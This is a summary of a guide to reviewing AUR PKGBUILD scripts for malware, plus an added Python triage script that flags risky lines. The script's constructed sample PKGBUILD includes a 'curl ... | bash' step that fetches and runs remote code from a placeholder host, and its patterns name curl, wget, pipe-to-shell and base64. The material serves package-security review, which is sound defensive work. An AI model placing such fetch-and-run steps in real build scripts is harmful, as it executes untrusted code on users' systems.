How to review an AUR package
Summary
This post provides guidance on reviewing AUR packaging scripts (PKGBUILD) in light of malware incidents. It explains what PKGBUILD files are, outlines the four build stages, and gives practical security-focused checks for sources, build steps, and install scripts, while noting the open, volunteer-driven nature of the AUR.
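A first-pass triage of a PKGBUILD along the three areas named above (sources, build steps, install scripts), as an added example that is not code from the post or from any Arch Linux tool. The check names, the regular expressions and the sample PKGBUILD are assumptions constructed for this illustration.

```python
import re

# Constructed PKGBUILD for illustration; not a real AUR package.
SAMPLE_PKGBUILD = r'''
pkgname=example-tool
pkgver=1.0
source=("http://example.invalid/example-tool-$pkgver.tar.gz"
        "helper.sh::https://example.invalid/raw/helper.sh")
sha256sums=('SKIP'
            'SKIP')
install=example-tool.install
build() {
  make
  curl -s https://example.invalid/setup | bash
}
package() {
  make DESTDIR="$pkgdir" install
}
'''

# Heuristics assumed for this example; a hit means "read this line yourself".
CHECKS = [
    ("plain-http-source", re.compile(r"""["'](?:[^"']*::)?http://""")),
    ("checksum-skipped", re.compile(r"""['"]SKIP['"]""")),
    ("install-script", re.compile(r"^\s*install=\S+")),
    ("network-fetch", re.compile(r"\b(curl|wget)\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(ba|z)?sh\b")),
    ("encoded-or-eval", re.compile(r"\b(eval|base64)\b")),
]

def review_pkgbuild(text):
    """Return (line_number, check_name, line) for each line worth a manual look."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines and comments
        for name, pattern in CHECKS:
            if pattern.search(line):
                findings.append((lineno, name, stripped))
    return findings

if __name__ == "__main__":
    for lineno, name, line in review_pkgbuild(SAMPLE_PKGBUILD):
        print(f"{lineno:3}: [{name}] {line}")
```

A hit only points at a line to read by hand, and an empty result does not replace reading the PKGBUILD and any referenced `.install` file in full.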